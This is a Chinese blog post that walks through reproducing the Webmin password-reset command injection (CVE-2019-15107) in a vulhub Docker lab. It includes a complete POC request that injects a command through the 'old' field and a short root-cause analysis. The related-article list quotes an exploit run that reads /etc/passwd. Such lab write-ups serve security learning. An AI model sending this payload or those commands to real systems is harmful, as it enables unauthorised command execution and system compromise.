CVE-2019-15107 复现(Webmin)

最新推荐文章于 2023-11-05 14:04:44 发布
最新推荐文章于 2023-11-05 14:04:44 发布
阅读量700 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 linux docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/109668250
版权

一、漏洞描述

Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。影响版本为Webmin<=1.920。

二、环境搭建

下载vulhub、编译运行

# Download project
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

# Enter the directory of vulnerability/environment
cd flask/ssti

# Compile environment
docker-compose build

# Run environment
docker-compose up -d

其中在docker-compose up -d的时候速度太慢,需使用阿里云镜像加速,配置如下:

[root@localhost ~]# mkdir -p /etc/docker
[root@localhost ~]# tee /etc/docker/daemon.json <<-'EOF'
{
  "registry-mirrors": ["https://9cpn8tt6.mirror.aliyuncs.com"]
}
EOF
[root@localhost ~]# systemctl daemon-reload
[root@localhost ~]# systemctl restart docker

进入漏洞环境目录:

cd /vulhub-master/webmin/CVE-2019-15107

启动环境:

sudo docker-compose up -d

访问地址:https://搭建环境所在机器ip地址:10000/
在这里插入图片描述
由于存在漏洞目录在/password_change.cgi,而Webmin存在referer安全检测,所以访问如下:
在这里插入图片描述
按照提示修改配置文件,将1改为0,进入docker:sudo docker exec -it cve201915107_web_1 /bin/bash
在这里插入图片描述

三、POC测试

POST /password_change.cgi HTTP/1.1
Host: 192.168.43.180:10000
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: redirect=1; testing=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user=rootasd&pam=&expired=2&old=id&new1=test2&new2=test2

注意:user不能为root用户,自己随便编,old为执行的命令。
在这里插入图片描述

四、原理浅析

该漏洞形成的主要原因是在于执行qx/…/,代码如下
在这里插入图片描述
在perl中的用法,qx/…/相当于php的``,可以直接执行命令的。

复测下来感觉还是很鸡肋,首先得修改配置文件才能利用该漏洞,也就是说得管理员忘了Webmin的密码,他修改了配置文件/etc/webmin/config之后,/password_change.cgi能访问才能利用。

小拓展:

修改webmin密码:

/usr/share/webmin/changepass.pl /etc/webmin/ root root

详情参考:https://www.cnblogs.com/zhouhbing/p/4234131.html

痴人说梦梦中人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
在Ubuntu的命令行下下载并安装Webmin
10-02
在Ubuntu的命令行下下载并安装Webmin
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 1993
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定杂性和学习周期。为了
【漏洞-webmin-命令执行】vulfocus/webmin-cve_2019_15107
10-14 1674
webmin-命令执行】无需身份验证接口
CVE-2019-15107Webmin远程命令执行漏洞
qq_51459600的博客
01-04 3666
CVE-2019-15107 Webmin远程命令执行漏洞 漏洞影响版本为Webmin<=1.920 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。 环境搭建 靶机:CentOS7(192.168.2.101) webmin在ssl模式下是无法显示界面的,我
【漏洞Webmin 远程命令执行(CVE-2019-15107)
最新发布
过期的秋刀鱼
11-05 353
1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。直接访问https://your-ip:10000/password_change.cgi。上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行的命令。
vulhub靶场Webmin(CVE-2019-15107)漏洞
weixin_45095113的博客
12-12 720
Webmin(CVE-2019-15107)漏洞
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
cve-2019-11477.rar
06-20
此漏洞只支持本地检测,不支持远程检测模式,检测成功率很高,可以排查网络资产中是否存在此问题,避免此漏洞造成的DoS 问题
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -d root@9460493fa985:/# passwd root Webmin>用户名= root,密码= root :high_voltage: root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d Creating network "cve-2019-15107_default" with the default driver Pullin
linux操作系统-Webmin管理工具
04-26
linux操作系统-Webmin管理工具 分享给大家学习
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
webmin远程命令执行漏洞(cve-2019-15107)深入分析
whatday的专栏
06-27 2153
漏洞描述 近日Webmin被发存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞分析 首先分析msf给出的插件 根据插件,还原出poc如下: 当poc执行后,会向p.
Webmin 远程命令执行漏洞(CVE-2019-15107)
黑白的博客
12-06 467
声明 好好学习,天天向上 漏洞描述 Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 影响范围 Webmin<=1.920 过程 这里使用1.910版本 使用vulhub cd /app/vulhub-master/webmin/CVE-2019-15107 使用docker启动 docker-compose up -d 执行完成后,访问https://your-ip:1000
Webmin 远程命令执行漏洞(CVE-2019-15107)
weixin_44522540的博客
05-03 713
一、环境搭建 本次采用vulhub进行 二、过程 POST /password_change.cgi HTTP/1.1 Host: 192.168.252.145:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif
Webmin 远程命令执行漏洞
jammny
01-16 1460
前言: Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 影响版本: Webmin <= 1.920 漏洞代码: def peer "#{ss1 ? 'https:// : ' http://' }#{rhost}:#{rport}" end # Targe...
漏洞------Webmin 远程命令执行漏洞(CVE-2019-15107)
Z_Grant的博客
09-23 7000
文章目录一,webmin简介二,漏洞概述三,漏洞(1)环境搭建(2)exp四,漏洞分析五,漏洞修 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
反制Goby扫描之XSS点击上线
痴人说梦梦中人
08-15 2910
反制Goby之XSS点击上线1.测试环境2.XSS测试2.1 修改http服务器的`X-Powered-By`3.CS上线 最近看到有大佬利用goby漏洞反制攻击者,特意下,原理就是通过XSS进行交互,调用Node.js函数exec执行命令,最新版本已经进行了修,如果还在使用低版本还是尽快升级吧。 1.测试环境 goby-win-x64-1.8.255 phpstudy2016 CS4.3 2.XSS测试 2.1 修改http服务器的X-Powered-By 注意此处<img src=1 o
CVE-2019-11477 漏洞教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞的教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值